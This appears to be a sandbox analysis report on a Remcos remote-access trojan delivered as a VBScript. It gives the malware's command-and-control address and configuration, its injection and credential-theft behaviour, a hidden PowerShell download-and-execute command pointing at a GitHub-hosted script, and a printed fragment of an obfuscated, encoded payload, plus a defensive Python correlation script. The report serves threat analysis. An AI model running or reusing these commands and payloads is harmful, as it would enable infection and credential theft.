Analysis
max time kernel: 148s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 03-12-2024 22:37

Static task: static1
Behavioral task: behavioral1 (Sample: remcos.vbs, Resource: win7-20240903-en)
Behavioral task: behavioral2 (Sample: remcos.vbs, Resource: win10v2004-20241007-en)
General
Target: remcos.vbs
Size: 563KB
MD5: f7c17bfb4247e64e22dd52540a4b903b
SHA1: 368ba4d02df294fa42efee5e4f330d5e7260d0c3
SHA256: 23ca901cd7f4f0ca6b2a652c7467911756241a02e37ebf60c6c09c6224478622
SHA512: 5f79d697ba68f6d285d56b8f38587774eb95162be0af3080a14ea9e277b0b33e3c20c8ccd74c6dddcc06eff3aed36b2c5bb096a8b92101c6f27d2603dfb136a4
SSDEEP: 12288:eQO27ODRJ7gfddv13rIJQ9HmFboRCuo52CDm09LghGmQ3DnIE2YgdhhC:eN27a7mMJQl2Ac4CDdg8mQPGhhC
Malware Config
Extracted: remcos
RemoteHost: 41.216.183.218:56792
audio_folder: MicRecords
audio_record_time: 5
connect_delay: 0
connect_interval: 1
copy_file: remcos.exe
copy_folder: Remcos
delete_file: false
hide_file: false
hide_keylog_file: false
install_flag: false
keylog_crypt: false
keylog_file: logs.dat
keylog_flag: false
keylog_folder: remcos
mouse_option: false
mutex: Rmc-I5RS8V
screenshot_crypt: false
screenshot_flag: false
screenshot_folder: Screenshots
screenshot_path: %AppData%
screenshot_time: 10
startup_value: Remcos
take_screenshot_option: false
take_screenshot_time: 5
Signatures
Remcos family

Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
Processes:
resource                                                                      yara_rule
behavioral2/memory/1680-235-0x0000000000400000-0x0000000000424000-memory.dmp  Nirsoft
behavioral2/memory/628-236-0x0000000000400000-0x0000000000457000-memory.dmp   Nirsoft
behavioral2/memory/1596-237-0x0000000000400000-0x0000000000478000-memory.dmp  Nirsoft

NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource                                                                      yara_rule
behavioral2/memory/628-236-0x0000000000400000-0x0000000000457000-memory.dmp   MailPassView

NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource                                                                      yara_rule
behavioral2/memory/1596-237-0x0000000000400000-0x0000000000478000-memory.dmp  WebBrowserPassView
Blocklisted process makes network request 4 IoCs
Processes:
flow  pid   Process
6     2484  powershell.exe
39    1588  powershell.exe
40    1588  powershell.exe
42    1588  powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
pid   Process
3132  powershell.exe
2484  powershell.exe
3664  powershell.exe
4588  powershell.exe
3196  powershell.exe
1132  powershell.exe
1092  powershell.exe
.NET Reactor protector 1 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource                                                                      yara_rule
behavioral2/memory/1588-214-0x0000000007930000-0x0000000007986000-memory.dmp  net_reactor

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description        ioc                                                                                                  Process
Key value queried  \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation  WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
description  ioc                                                                                                                       Process
Key opened   \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts  powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Drops file in System32 directory 1 IoCs
Processes:
description                   ioc                                                                                                             Process
File opened for modification  C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
Note the literal, unexpanded %AppData% in the path: the variable was never expanded, so the relative path resolved against the System32 working directory, which is why this registers as a System32 drop rather than as a Start Menu shortcut under the user's profile.
Suspicious use of SetThreadContext 3 IoCs
Processes:
description                          pid   Process         procid_target
PID 1588 set thread context of 1596  1588  powershell.exe  126
PID 1588 set thread context of 628   1588  powershell.exe  127
PID 1588 set thread context of 1680  1588  powershell.exe  128

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
description  ioc                                                          Process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe (3 events)
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe (11 events)
Delays execution with timeout.exe 1 IoCs
Processes:
pid   Process
4484  timeout.exe

Kills process with taskkill 1 IoCs
Processes:
pid   Process
2872  taskkill.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs
Processes:
pid   Process         events
2484  powershell.exe  2
3664  powershell.exe  2
4588  powershell.exe  2
3568  powershell.exe  2
3196  powershell.exe  2
516   powershell.exe  2
1132  powershell.exe  2
1588  powershell.exe  2
1092  powershell.exe  2
396   powershell.exe  2
3132  powershell.exe  2
1680  powershell.exe  2
1596  powershell.exe  4

Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
pid   Process         events
1588  powershell.exe  3
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
pid   Process         Token(s) adjusted, in order
2484  powershell.exe  SeDebugPrivilege
3664  powershell.exe  SeDebugPrivilege
4588  powershell.exe  SeDebugPrivilege
2872  taskkill.exe    SeDebugPrivilege
3568  powershell.exe  SeDebugPrivilege
3196  powershell.exe  SeDebugPrivilege
516   powershell.exe  SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (22 events)
1132  powershell.exe  SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36, then a second pass of SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege (36 events; the export is capped at 64 IoCs)
The bare numbers 33 to 36 are privilege LUIDs the sandbox did not resolve to names; on current Windows builds they correspond to SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege and SeDelegateSessionUserImpersonatePrivilege. Together with the named ones, PIDs 516 and 1132 enable every privilege present in an elevated token in one burst.
Suspicious use of WriteProcessMemory 63 IoCs
Processes:
Each row collapses identical "PID <source> wrote to memory of <target>" entries; events is the repeat count.
source pid  source Process  target pid  events  procid_target
2256        WScript.exe     2484        2       82
2484        powershell.exe  3664        2       84
3664        powershell.exe  596         2       86
596         csc.exe         3936        2       87
3664        powershell.exe  2636        2       88
2256        WScript.exe     2100        2       102
2100        cmd.exe         3948        2       104
3948        cmd.exe         4236        2       106
3948        cmd.exe         3568        3       107
3568        powershell.exe  3196        3       108
3568        powershell.exe  516         3       109
3568        powershell.exe  1132        3       112
3568        powershell.exe  3092        3       114
3092        cmd.exe         356         3       116
356         cmd.exe         2544        3       118
356         cmd.exe         1588        3       119
1588        powershell.exe  1092        3       120
3948        cmd.exe         4484        2       121
1588        powershell.exe  396         3       122
1588        powershell.exe  3132        3       124
1588        powershell.exe  1596        4       126
1588        powershell.exe  628         4       127
1588        powershell.exe  1680        4       128
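Read together, the WriteProcessMemory and SetThreadContext rows show the classic create-suspended, write, set-context injection: powershell.exe PID 1588 writes into and then sets the thread context of PIDs 1596, 628 and 1680, and those are exactly the three processes whose memory dumps hit the NirSoft YARA rules. The Python below is an added example written for this report (not sandbox code) that automates that correlation over rows in the export format above. WRITE_EVENTS, CTX_EVENTS and YARA_HITS are a constructed subset copied from the signatures; the function names are this example's own.

```python
"""Reconstruct the injection chain from the sandbox's API-call signature rows.

Added example for this report, not part of the sandbox output. WRITE_EVENTS,
CTX_EVENTS and YARA_HITS are a constructed subset copied from the
"Suspicious use of WriteProcessMemory", "Suspicious use of SetThreadContext"
and NirSoft YARA signatures above, one line per event.
"""
import re
from collections import defaultdict

EVENT_RE = re.compile(
    r"PID (?P<src>\d+) (?P<api>wrote to memory of|set thread context of) "
    r"(?P<dst>\d+) \d+ (?P<image>\S+) \d+$"
)
DUMP_RE = re.compile(r"memory/(\d+)-")

WRITE_EVENTS = """\
PID 2256 wrote to memory of 2484 2256 WScript.exe 82
PID 2484 wrote to memory of 3664 2484 powershell.exe 84
PID 3664 wrote to memory of 596 3664 powershell.exe 86
PID 596 wrote to memory of 3936 596 csc.exe 87
PID 3664 wrote to memory of 2636 3664 powershell.exe 88
PID 356 wrote to memory of 1588 356 cmd.exe 119
PID 1588 wrote to memory of 1092 1588 powershell.exe 120
PID 1588 wrote to memory of 1596 1588 powershell.exe 126
PID 1588 wrote to memory of 1596 1588 powershell.exe 126
PID 1588 wrote to memory of 628 1588 powershell.exe 127
PID 1588 wrote to memory of 1680 1588 powershell.exe 128
"""
CTX_EVENTS = """\
PID 1588 set thread context of 1596 1588 powershell.exe 126
PID 1588 set thread context of 628 1588 powershell.exe 127
PID 1588 set thread context of 1680 1588 powershell.exe 128
"""
# (memory dump, yara_rule) pairs; the same dump can hit several rules.
YARA_HITS = [
    ("behavioral2/memory/1680-235-0x0000000000400000-0x0000000000424000-memory.dmp", "Nirsoft"),
    ("behavioral2/memory/628-236-0x0000000000400000-0x0000000000457000-memory.dmp", "Nirsoft"),
    ("behavioral2/memory/1596-237-0x0000000000400000-0x0000000000478000-memory.dmp", "Nirsoft"),
    ("behavioral2/memory/628-236-0x0000000000400000-0x0000000000457000-memory.dmp", "MailPassView"),
    ("behavioral2/memory/1596-237-0x0000000000400000-0x0000000000478000-memory.dmp", "WebBrowserPassView"),
]


def parse_events(text):
    """Return (api, source_pid, target_pid, source_image) per signature row."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            events.append((m["api"], int(m["src"]), int(m["dst"]), m["image"]))
    return events


def find_injected(events):
    """Map target_pid -> (injector_pid, injector_image) for every process that
    received BOTH WriteProcessMemory and SetThreadContext from one source.
    A parent writing into a child it just created (WriteProcessMemory alone)
    is normal CreateProcess behaviour and is deliberately not flagged."""
    writes, contexts, images = defaultdict(set), defaultdict(set), {}
    for api, src, dst, image in events:
        images[src] = image
        (writes if api.startswith("wrote") else contexts)[dst].add(src)
    return {dst: (src, images[src])
            for dst, srcs in contexts.items()
            for src in srcs & writes.get(dst, set())}


def correlate_dumps(injected, yara_hits):
    """Attach the YARA rule names of memory dumps to the injected PIDs."""
    rules = defaultdict(set)
    for dump, rule in yara_hits:
        m = DUMP_RE.search(dump)
        if m and int(m.group(1)) in injected:
            rules[int(m.group(1))].add(rule)
    return rules


def report(write_text, ctx_text, yara_hits):
    """Injected PID -> {'injector': pid, 'yara': sorted rule names}."""
    events = parse_events(write_text) + parse_events(ctx_text)
    injected = find_injected(events)
    rules = correlate_dumps(injected, yara_hits)
    return {pid: {"injector": inj, "yara": sorted(rules.get(pid, ()))}
            for pid, (inj, _image) in sorted(injected.items())}


if __name__ == "__main__":
    for pid, info in report(WRITE_EVENTS, CTX_EVENTS, YARA_HITS).items():
        print(f"PID {pid}: hollowed by {info['injector']}, payload {info['yara']}")
```

The point of requiring both APIs from the same source is precision: every parent in the tree (WScript.exe, cmd.exe, the earlier powershell.exe instances) shows WriteProcessMemory on its children because CreateProcess does that, and only 1588 also calls SetThreadContext. The three hollowed targets are then the right processes to dump, and the YARA rules tell you what was mapped into them.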
Processes
(the bracketed number is the depth in the process tree)

[1] C:\Windows\System32\WScript.exe (PID 2256)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\remcos.vbs"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2484)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri 'https://raw.githubusercontent.com/latencyx0/EmptyBuilder/refs/heads/main/remcos.ps1' -UseBasicParsing)"
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -encodedCommand 
         $ n m g b K c Y H   =   9 5 1 5 
         $ l b L E n E C H   =   ( [ M a t h ] : : S q r t ( $ s G h k O T i b )   *   1 1 ) . T o S t r i n g ( ) 
         $ f l G k x Q q K   =   " f " 
         $ J r J U Y c v g   =   " d " 
         $ x r e V E W C x   =   " N " 
         $ a N y A n S r R   =   " G " 
         $ d i u e t L A r   =   " d " 
         $ n n i o E t S r   =   " J " 
         $ D i O t R b H F   =   " S " 
         $ M p u k w P U j   =   " G " 
         $ O e k N Y e e Z   =   " c " 
         $ h k z I x L G l   =   " B " 
         $ K a i s Y V t N   =   " 3 " 
         $ J B w Z Z o w m   =   " Z " 
         $ E g O m q J z Q   =   " i " 
         $ i A p U x r j p   =   " c " 
         $ L f o s Q L m Y   =   " M " 
         $ p t p f G a Z D   =   " 9 " 
         $ t 1   =   6 4   +   5 6 
         $ t 2   =   ( $ t 1   *   6 )   -   ( $ t 1   /   7 ) 
         $ t 3   =   " f "   +   " d "   +   " N "   +   " G "   +   " d " 
         $ t 4   =   " J "   +   " S "   +   " G "   +   " c "   +   " B " 
         $ t 5   =   " 3 "   +   " Z "   +   " i "   +   " c "   +   " M "   +   " 9 " 
         $ p   =   $ t 3   +   $ t 4   +   $ t 5 
         $ a   =   [ T e x t . E n c o d i n g ] : : U T F 8 . G e t B y t e s ( $ p ) 
         $ d   =   [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( " Q V Q V A T d x E f F V s T 3 J N X L d 4 g W M + T A o E Z b q 5 f v K C 6 x z R s w C 0 9 f + R 3 n 5 5 6 9 Q 2 u h 7 Q w a s P I g 1 O k C g Q w J M d E q Y D 7 Y s V h 0 g l a t 7 x U F O K Z p 9 B d p v E w n J S h O M W i 0 v w u j A g v 4 D O + Y Y f b L Q i 9 L c i b N 5 v g Q c D 0 I R t 5 6 A w J C T 8 v 8 W t h 8 i t S z + V k H 6 D 8 A F r 9 Y q m + p O K u c V + c J r E 7 1 K 0 e y k 2 E d O H a z P t I E f + q v J i K j g D E F G o + m K r U z 2 k L h 1 V s k S o t R H b Z / T v K D I u 8 X x G + q E u R 2 U a V 8 L M s z N r C d V W Q K y + 0 K j e S 7 A 2 4 u B b c w H 7 c + / G 8 D d c i B N + N Z q p X 5 T g c i s 5 4 j W L K P E Y J R M y 3 m U Y n D G Y 7 K p H o 6 N b 7 l 0 5 j p i B a m 3 v y P c x j I V H 5 F f C 3 a f P w 2 b 7 L x z K X L U H n / L O q w I L d j y t x F P p f m B p I h c g k M m C 3 Z 4 c f w M 0 k 5 w E d Z P 5 c P M 1 + 2 E o R B n c z u j z G F Y 0 F C a b k Z E n V f j 5 e 8 P D b 2 M J I i B T h W S b Z V 5 q 8 n / g j A q / o 9 n y 9 O I V P C D d s s j 5 c y A s t S Y R J n k J 5 9 r s f 2 A Z m i Q 9 f t 1 a d I C 9 m W N e X 8 I 4 P V 8 U d x P W v u Z X 5 E e D M n Q 3 6 l l S e c I T X Q R C U u 1 M e v u f 2 Y V a W t C W 8 M H n p f l 4 5 H D t F S L v y 1 Z U p 2 f W F s y J f / Z f K 8 G O N M N n G x D q 2 6 U F / 0 n W B S f d C 5 d P W 0 4 r J N Q N V g d S K n 8 I C T l y U 3 M M 2 / t j Q y B C K M G X m 4 k Q q r 6 7 O H n Q A H H q Q 0 x 2 Z 6 1 F 4 2 j V e V t n c j c 7 P 2 k a K c o U e I z J F X S S u G z o f r z G 1 z b Z 9 5 r u 6 l 7 P r d N 5 2 i N l F + K A P F I k D w Q R v A Q j s 2 S 9 m H 1 2 J D k B I o p b w L z g 0 x 1 W y T l q 4 i N s w J X y K q o Q d X Y W x o A s 5 E X 9 O y A A 7 d J y 2 A o z F f m k a U 0 M v J / 2 4 9 E Q y u x m I v c 1 A i V n M 8 b K o D J r 6 w + Q l o z O f + P H W f q T h R n 3 Z n u S L Q a 6 I 3 Y i k i 4 L I j k q x 5 7 L a g 5 4 j i k M S u 8 r E m a 4 z o x v k S 6 c D 0 G P C
 a 1 j g S E q J 4 F c K 0 S + / M W 7 w V N u D C d Y 0 k m k A q x C 0 g 8 3 c C 9 j P M a f E m 7 t R c 3 Q A z F T a f 0 v r U n A + r F m Y g u k C C s a 5 d O q D C 9 R A l b Q M f G R W S x D o + E 8 8 R 9 8 E 4 C V W 6 k K u F q l z x E D F o B E y S 0 s P 2 i p 5 p G E J 9 U s C j F n Y V H g L 4 B 2 L V e / t w u y D o A y y E s T G l U x + 3 4 L g o y f E C s s Y z k Y 5 4 B Q h J I P u a 1 a k F F 7 a 3 B F C b j t r j s L 7 o Q t S a o x u U u V r T + s y Z Y M Z m W E B 6 H Z g W E 4 I K J 4 N I I f 6 z W U D O q K D Y v 6 8 g g S q m t 4 5 e 3 Y 9 4 B 0 + N B T Q i Q X 2 d x i / B V p L w q q b q S B c c g c c K G 4 y t f v 7 m + r n w o U p S Y 8 P h p X / 0 + n G X H y K 4 p S I R h G 2 F Z 3 + T t S H Q D I Y s S 1 e R d l n o l E 3 e Z z s o T V 7 N Y p p T A R M c O 7 n U V / 9 O / 9 n k Y 6 w h Z w c t A N n T U y a p d O 3 / d / i G 5 V g K Z D W Y 8 T 7 P i V P P U j Q 7 U V o c b 8 h 5 Z c M J 3 1 2 R / G + H W 2 Z t 7 b X G f j z y N H I y 1 r Y y j R Z W q 4 q d V j s I P l P Y 1 s Z u W E U o 9 W s / A p A F y Y x 0 h u 5 2 z G v 6 W 0 P 2 J J 1 m 4 c O x P / q M D t O 4 8 2 x u c I r j A N J g C A T R n F X R h B S J 6 j / 5 j 9 4 z + T g X l C y u C N 1 A O Q 4 Q z N Z w w H X C A g n L J W A T E w o J k I 7 p Q S T A N 2 h + x H T e D E J p f 4 1 j 2 V B J z H I q m A 3 T p o O I s I F w 7 s / u s y W k k N q G C T b C y f F 2 n R S d P p A 7 D I i A x x 0 0 k 1 Y q M S r E S g j A n p R o 2 q N h Z 7 t R 5 K Y e e i D 2 8 j a G 0 k + K k 6 G y 8 m v 6 j L 2 t p S t V v 7 F 3 V c H 9 v C B m t R m w f Y 4 T C P m f h t d h k G W A l E Y V Q / t t H c q 6 v v i E c j o 1 9 R d 8 t D b f o D y J l B g Q G c c k S C m X B S u a Q Q c K r C u B l / n Z E q M s Y R I Q Y 9 u z e 1 M q 7 b f M F U J p b a m 1 d w a 5 G g Q m c V b J / u u O w x g 7 w Q g + q A r / J 5 z 4 d V R g 1 G 8 t n y s 0 m j d i c D 0 M S p y 7 W 2 K d C x I x e i I y T f I u X l S 9 Z U 9 N 1 i q 4 e t S 9 1 b t l + Y o L o A + B Y u H j c f o L l d s 0 P X k M z 2 /
 c x A f P Z Y 3 6 A J y P U K 3 5 k i X j / j 2 J E Y J A f 9 O l b M l 5 o T f a / k 0 k s C W Q 6 + a 7 + S E F r j C 0 r L 8 + H v e p Q G E 7 u R e Z s Q C Y 6 f z J l P B o F U / g / q Q k k d Z a C g r s N n S N y g Q H k 5 j b q Y R a Q w m X j w K U D 7 4 p z J 0 d V C T I k F e n D 3 r U x U O 2 0 A U g r w Z D n 5 C g m l H Y x a K 2 5 H 3 a i u R L J A K Q z n L C 5 X W L A C T X C i 8 k M 5 n 7 / y 8 j d j p e b F z v X a + F k w 1 + T R O 5 Q Q + F 2 x c T A 4 S b m + C 4 x R n M f m F D L G N J L n k / f O I a 6 J J g f o e i P d M K n 2 T i q Q 4 w e F o U G f 7 s w o c N Q J c 8 t u 2 + z O S d 4 e Y J c M A s q M u n v p B G O X g i N J n C 8 i 4 O U C l K 9 a U h F V B A 1 S 8 t T I c I h N h s L Q S T Z n R Y / c u z + o x K 5 u I F R u i z 1 J Q G E 9 8 f x Y y K n w d u U f X K g L 3 X h b 4 m H L 5 w 6 X j 6 k 2 M Z M i H t Z 5 H k G W r 7 6 F d G 0 Y P 9 K E i Q 4 t V D Q + 2 q w 5 c g h 4 y a u h a t 6 O S 0 f W d J c S R S J N P 6 n 1 D 2 V T L Q m 5 L I Z E C d p A + o p H q o 7 / + A u R K M W H c O K g w K u n N Z 1 x A x 6 c G Y z U 9 y p T a y s z g P L h w M 4 R a 5 4 1 9 0 n 5 p p i C y a s j t P a K x 0 s 0 A p c d 2 2 s m 4 w Z 1 7 E B c I p r J x 0 G x Z 3 T k F q 2 p + Q C 3 3 G C 3 B 1 a M a O A O 3 n v / m n h X O i C 4 j i r b n l q f e k E Q 0 K x U X U u h / j / I a j l G c z V i J r 3 1 b h q A v N T T 9 Q L E 0 w h Z c r X 8 1 + o g J I D R 5 t P P g j 0 k j M g h + g 0 9 K p Z o 9 P i G 8 j m J n b X o H J T D l g m O n C V W l y L x q F E h 2 d j v J i o N d V F e s o k 0 D Z F + g T m Z h d o 3 s O q d r U w y P a S 8 M / O g L Z i D 6 Z r 8 Y n G g M L G 5 l F 0 A 3 p s I f r N a F 5 + X R 5 K f + 8 5 n i 1 J x 2 B O I H + 1 I R w b a 6 m d 8 G T 9 I e y 8 K G d p r Q q J o 8 6 V X B L 4 4 3 t 3 B T f I 9 F r J z 4 X / x l o X x s K k W D e 4 / R 6 j + C Y w b P L m W 9 k J q P C r j 2 e o 1 d q 1 e G f I i I v n 1 I E 5 m f a 4 z q L x 8 v t i J t S S l / e 3 D j n N u N B W s F 2 O X u N J F z I 1 G T v F u C / C e N
 8 1 Y m 7 A O T Z Z J e j s f P S K o j F h h 5 Q c 9 Q 7 k t T g b r x L W L W 9 n h e y a H y w I x Q o S X I V W O I f + p T U l P J X C T x Y u m Q 4 A b n F g c 9 + t P r Z 5 b / d 9 H z J X I 7 c m 2 Z 8 Y b a p c H e Y S Q z E n I g 8 h l X D Z I 0 1 5 e r J u P z r Y k 7 z 6 s O 3 M u y a Y 4 h n O W L i T z w x y D o I 3 / b F E H h g t y 7 O t N K J Z V 5 k W 4 j v h O / K A 0 A m s l l y k p j u v E Y L 0 f 2 a V B w p K s 9 Y J t J M C Z C 7 / U s S w 9 q F R e a p W g M 8 2 6 w i 9 8 n 5 p Z d B M Z D F y h x p l U Y K Z D u k 2 e H 9 h i 8 1 k g S V m a s w 2 I 0 6 k H D P f V A 8 c n G T J 6 s 0 y P H 5 r n K Z v g H / K F g z 1 b 3 J S P b V q + 5 c / P Z p R v 2 m K a Q B b P + g e q h R k B j m d 5 V F 2 C w S C A i / 2 F T C H g o p B t 7 O l A 8 l c q b L P i 7 Z b E O R q B 1 y r o L t w 2 X 7 Q U Z H C V W R G 2 J u 0 G u B P I S W i h a Q 5 F T + T F q n F N V Y a x M E 1 d v R c n y R i f 8 G r v Q O J h 3 1 w 9 R d J 7 y t S / I B H Y q e u 7 / W N l F e v w U 6 r k T T e v i m 8 v i W 9 s A G p 0 8 s + B L b e 5 + y g 3 m j w Q G L 9 r y h A P N Y C a M i Y 8 t A p I 3 E X H 1 r L 2 1 H U z G g T h w p s b F A U 2 n c 9 X 5 g 9 L 3 l 7 t 9 U s q P l X o Y A F n e S D y h k Z R m O 1 j B f b 3 I I k t T A n p j Z v i 4 O a u n / o k 6 k a u H t y q N 9 t 6 U Y o O R B c d H p K W A d X 3 X U m K X J + E + 6 L R z 9 P M E t V i P i A M h i I Y k T x g n 0 K u q s w K I C k n o p s l X f 6 p D s i R 4 v 1 O 0 j e t j B A G z 6 Y O z x + i o l X A I I F o I X k z u t / u Q 4 J e i 3 g E t B P / U A B B p D c 2 u y d z o S 6 Y U Q w d K W k l b O x Z G P M O z B y x 7 I P c B Y D C 5 Y 0 6 D X u V 9 R O l 5 F L l K x D q U a 6 V U G A o f j Q c W Q 2 X i b T E R L i t o W a c V V B 1 9 6 a A G 6 v 8 U b G n 1 b e Y I 7 A a a p I f f 7 M 7 P X f G I S e 6 a Z H 5 0 e I K B i N T b P l v + r P 3 m G H 7 x T I 4 b T c t 5 f k S p 5 A V O f u t B t h i y s W e T / 0 G A j J V z x 3 B k i R m f t B 0 I P 8 2 m N T r A a M z D B E i Q c l d c M U m a
 O j V 0 Q u 3 + S m V Q O F + j P i E 5 F J + 3 c p z i X Z o v M + s / b h U 4 N b F s q G z o u o Q G g n k G 8 B I B k g l p f 1 O T 3 C 8 0 y 7 c D n Q H 7 k M 3 Q u W H L E e Z R J w F n T / G Q 4 N I m s e w w v s t R l A c C j g d S D j 4 / o 0 W v s 5 o M 3 Z 7 B D d 7 L g W 6 D c r 4 C d n k f Q I a O C 0 k M K V s U V n r g a J A v z 8 8 a C j 8 M I t F l G 1 j t U L m K 2 8 B o q 8 i n j 1 G l B u z J X q 0 o 2 v f E I 2 r 0 I r D s v G z x I i E L K S N 9 / r O 8 1 B i I U j S D i a G 7 f H H + c d b R g u o 2 N R 2 w N S O o D Y W D T G U I j R f r D w i F Z d x j w v u F p + 3 c W n l 0 e M v x P + R 9 L l L c U c Y h x R O I G Q I t G v S x B M z 4 7 O 8 C J / d 0 0 F P d e P p u E G 9 6 W y u G V e b n G q i k O i k Q C f A C p w 3 c H V V m n L o 4 R N R D E 2 e o W q E p + 5 c Q / t H o K T P k R n Y k V U x r U k P x T / p Y m F 2 d P k N A N 1 V 2 d R f a l S 2 e N x g z Q s v F u S a 0 b p u x 8 l R M 6 I y e 7 K e V r f 8 P K 8 b X B 0 C E 3 A X p M 1 g V C Q 3 f 0 v I 7 e K Z M z T 0 m k V o Z + x 8 4 8 4 f I R x c o e R + g V i 7 c f y O z v N K z Z 1 8 M j E e 3 H Y 6 g A 3 n 1 9 e G b 1 N W N Q X O H j l M V Z g b G C V I e D S W k w + e s x g 3 8 s k H D B w T e Z Y 5 d / O V 2 a P e 0 4 d d B C 9 4 y k x o s E s s u X h v u w B v 4 U j 0 O B d x k 7 b M L + G Y T y r + E 9 0 Q x r g 4 X K R T N b T r 1 O m E T h S N 8 N P M Y 0 2 3 j k s P k 8 o T n A L 1 c Q F Z T + p s h k y b n P j Z p K 2 p B P j t y L J o X 8 3 r S b R A K M a P K V r J Y f / o q p / 2 + T i l k X T 7 k Q T W c o w j k s L f i c W 3 M / v 9 3 r t 4 w D G j G X l w J A u e U / x Y y S B z 5 u s X H J I G 8 j q 5 N 7 a 0 i S s o k w I K f N e 2 F J w k K z 6 s S t H Y f 5 N j + D u i P q 3 V f c K P G g l S d b M l B 7 2 H 5 a O O a X X U c c 6 S n j N / b a 3 C + e x T h R T s a 4 2 s h v X 0 c g W 6 5 4 7 y 2 H c O H x M Y u p z b S D 1 X F i L 0 X r B x S R O N K e Q P 9 i U E X l 0 w u 2 u y M B V p t B Q 6 Q + g U P U f i P u A i R O O O p h 0 B + S 4 M b v P o Y
 f f C S 1 1 U H 2 2 R D K Q k g 9 8 5 0 R 7 H s j l r c c c H v o + 1 Z n F / 7 j V K T 3 9 X z 0 S j P h W c Y T J C R Z D d o C U v w b Q P v o k B A B 7 s 0 O K d x e T a u Q k X j N b V b u k i g Z j Z C G N Z z n I / B f j p s W J q O G K d F o m p w u j 6 O S R 8 y / H Z Z v f a r u A Q M D O x Z D P j a W W q O Z r z r A v H O K O / b F y B / 7 / p W m k K D O 3 Q w i i U / U J L C 6 F Y S M m z S k 2 a T s k u W F 4 s J W c f a n 6 T n Z f E X o P w L S r x Y 8 q k n x X z c N 5 N P b L i W 1 I T X x X h f q P a i d d 8 H N 3 1 Z z q A x E W U a J z v v 0 t B W o K u y q E b G w 6 B Q j L E Z M Y F U z M 6 q n l z 4 + C 5 I i 9 C 9 K M z N u H t 3 s L F z K P c 3 n x 9 S e D D N P i T N + R 0 O 1 t Q M u L r H T m y r p U 5 l c T f k 6 b T n E S u e 1 O 2 8 X c 7 b b F M 1 X U / 9 8 L M z k V n U i m Z 5 r 0 5 a + r e 7 D b W i o K q p n z P k 7 r k g I A w D z h J 9 N R D K v a S U 5 q 3 M Y K J l + m p L 8 O F n J p v x p V X C D C I x T q 0 s 4 k S J s C / a W 3 A b / s T x i Z R f F 5 2 b R r Z D I V 1 j P + A D e x 4 x l R 4 d j 3 Q L 2 I r a Z t s / C T O K T / 9 G J K y h 7 q u a x + J y l 6 Q q U + k D 2 8 q 7 i 3 d E L G T 7 G b h p 4 g n c U + f V g y Y M t y t 1 r n 4 7 V A V R v G 2 h y y v / o 0 F b i X f k 5 L U A d a a r x s 4 + P z 4 Q A z 9 5 + N N d f d S Y A d